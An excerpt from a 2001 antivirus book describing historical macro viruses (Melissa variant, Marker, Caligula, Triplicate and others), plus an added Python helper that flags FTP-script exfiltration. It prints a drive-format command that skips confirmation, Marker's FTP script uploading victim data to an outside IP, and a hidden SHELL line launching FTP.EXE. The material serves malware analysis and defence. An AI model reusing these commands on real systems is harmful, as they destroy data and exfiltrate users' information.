5.7 Macro Virus Examples

Malicious Mobile Code: Virus Protection for Windows
By Roger A. Grimes
Chapter 5.  Macro Viruses

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

5.7.1 W97M.Melissa.ac

This Melissa variant attempts to format local hard drives and corrupts CMOS memory, in addition to using email clients to forward itself. It drops a batch file called DRIVES.BAT that contains commands of the following form to format hard drives:

 echo y|format/q d: /v:Empty>NUL 

This command is repeated for drives D through Z; the piped "y" answers the format confirmation prompt so no user interaction is needed.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM. This executable attempts to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not cause permanent damage to your CMOS.

5.7.2 W97M.Marker

Marker is a Word macro virus that keeps track of whom it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS. The .SYS file contains the virus code, and the .VXD file is a script file used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4, to which I have added comments:

Example 5-4. Marker virus FTP script file
 o 209.201.88.110      ;opens an ftp connection to hacker's ftp site
 user anonymous        ;logs user in as anonymous
 pass itsme@           ;puts in password
 cd incoming           ;changes to subdirectory called incoming on hacker's site
 ascii                 ;puts file transfer in ascii text transmission mode
 put hsfedrt.sys       ;uploads tracking information to ftp site, where hsfedrt.sys
                       ;can be any randomly generated name
 quit                  ;ends ftp session

The macro code contains the following SHELL command, which allows it to do its work secretly (FTP.EXE reads its commands from the script file named by -s:, and vbHide keeps the command window from appearing):

 SHELL "COMMAND.COM /C FTP.EXE -n -s:c:\netldx.vxd", vbHide

It also disables Word's macro warning prompt. It keeps track of the user information found in Word's User Name and User Address fields, so anyone infected can usually find out who infected them and trace the origin of the virus back several generations. The virus maintains a value in the registry (HKCU\Software\Microsoft\MS Setup (ACME)\User Info\LogFile) to record whether it has already sent information from this particular user. If so, it doesn't do it again.

Although ACME conjures up images of Road Runner cartoons, it is a valid subkey name created by Microsoft, not by the virus.

Example 5-5 shows a log file provided in an example I received (names and addresses have been changed to protect the innocent):

Example 5-5. Marker virus log file
 'Logfile
 '09:08:36 - Saturday, 28, Nov 1998
 'Richard D. Collier, III
 'RichDesigns.net
 '
 '02:50:31 PM - Saturday, 28 Nov 1998
 'Elizabeth Rose'
 'Straight-A Students, Inc.
 '
 '12:49:03 PM - Saturday, 9 Jan 1999
 'Lillian Hanson
 'Genius Tutoring
 'Two Embargo, Suite 3800
 'Richmond, CA 94111
 '

5.7.3 Caligula Word Virus

The Codebreakers group released another intriguing macro virus. This one attempts to steal users' PGP private keys. PGP, or Pretty Good Privacy, is one of the world's most popular data and email encryption programs. PGP users have a private encryption key that is used to do the encrypting. The private key is itself encrypted, but usually protected only by a weak password. The Caligula virus is a stealth Word infector written in VBA5. When loaded, it checks whether the current Word document or global template contains a class module called Caligula. If not, it exports its source code to a file called IO.VXD and imports it into the global template. On the 31st of any month, it displays a message saying "No cia, No nsa, No satellite, Could map our veins. WM97/Caligula Opic [Codebreakers 1998]."

Each time the virus runs, it checks whether it has already tried to steal the user's PGP private key (if one exists) by looking in the registry key HKCU\Software\Microsoft\MS Setup (ACME)\User Info for a value named Caligula. If the value is present, the virus has already tried, or PGP isn't installed on the user's PC. If not, it reads PGP's install path from the registry and searches for the private key ring, which by default is named SECRING.SKR. Next, a new text file, CDBRK.VXD, is created as an FTP script file to upload the user's private key to the Codebreakers' FTP site. Even on systems without PGP, the virus keeps replicating like any normal macro virus. I'm not sure of the legal reasons, but many computer security experts said this macro virus action (the stealing of a user's private encryption key) did not violate U.S. law. Luckily, the Codebreakers web site was shut down in an unrelated hunt for the Melissa virus writer.
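Both Marker (5.7.2) and Caligula (5.7.3) exfiltrate data by handing FTP.EXE a script file with -n -s:. The following is an added triage helper, not code from the book or from either virus: it parses such a script, reports why it looks like an exfiltration job, and matches the hidden SHELL line shown in 5.7.2. The embedded sample is Example 5-4 with the book's annotations removed.

```python
"""FTP -s: script triage for the Marker (NETLDX.VXD) and Caligula (CDBRK.VXD)
drops. Added example; not code from the book or from either virus."""
import re

# Constructed sample: Example 5-4 as FTP.EXE would read it (the book's ';'
# annotations removed). Windows FTP accepts 'o' as an abbreviation of 'open'.
SAMPLE_SCRIPT = """o 209.201.88.110
user anonymous
pass itsme@
cd incoming
ascii
put hsfedrt.sys
quit
"""
IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

def parse_ftp_script(text):
    """Summarise what a -s: script would make FTP.EXE do."""
    info = {"host": None, "user": None, "password": None,
            "remote_dirs": [], "uploads": []}
    for parts in (ln.split() for ln in text.splitlines() if ln.strip()):
        cmd, args = parts[0].lower(), parts[1:]
        if cmd in ("o", "op", "open") and args:       # open <host>
            info["host"] = args[0]
        elif cmd == "user" and args:                  # user <name> [password]
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else info["password"]
        elif cmd == "pass" and args:
            info["password"] = args[0]
        elif cmd == "cd" and args:
            info["remote_dirs"].append(args[0])
        elif cmd in ("put", "send", "mput"):          # data leaving the host
            info["uploads"].extend(args)
    return info

def exfil_indicators(info):
    """Reasons the parsed script looks like Marker/Caligula-style exfiltration."""
    reasons = []
    if info["host"] and IPV4.fullmatch(info["host"]):
        reasons.append("connects to a bare IP address rather than a hostname")
    if info["user"] == "anonymous" and info["uploads"]:
        reasons.append("uploads files over an anonymous login")
    return reasons

def is_hidden_ftp_shell(vba_line):
    """Matches the 5.7.2 SHELL line: FTP.EXE fed a -s: script, window vbHide."""
    return re.search(r"\bshell\b.*\bftp(\.exe)?\b.*-s:.*\bvbhide\b",
                     vba_line, re.I) is not None
```

Run it over any .VXD or other text file a suspicious macro writes to disk, and over the extracted VBA source, to confirm the pattern before touching the registry markers described above.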

5.7.4 Triplicate Virus

Triplicate is a common macro virus and the first cross-platform virus to infect three applications: Word, Excel, and PowerPoint. It infects the global template in Word, places an infected workbook called BOOK1 in Excel's Startup directory, and creates a new macro module called Triplicate in PowerPoint. Triplicate was initially placed on a virus writer's web site, hidden behind a web link. If a user clicked the link, it would load an infected document. In many cases, the document would load in Word from within the browser without setting off any macro virus warnings.

5.7.5 GaLaDRieL

GaLaDRieL is the first virus based on Corel Script, the macro language for Corel Draw. It does a simple file search for new victim files (files with the .CSC extension and the appropriate attributes). When a suitable file is found, it looks for the text "REM ViRUS", which identifies previously infected files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The Lord of the Rings.

5.7.6 W2KM_PSD

Long before Office 2000 was officially released, it had its first macro virus. This polymorphic class virus waits until the day of the month equals the current minute, then fills the current document with between 1 and 70 random shapes. It disables Word 2000's macro security by modifying the following registry key: HKCU\Software\Microsoft\Office\9.0\Word\Security.

Malicious Mobile Code: Virus Protection for Windows (O'Reilly Computer Security)
ISBN: 156592682X
Year: 2001
Pages: 176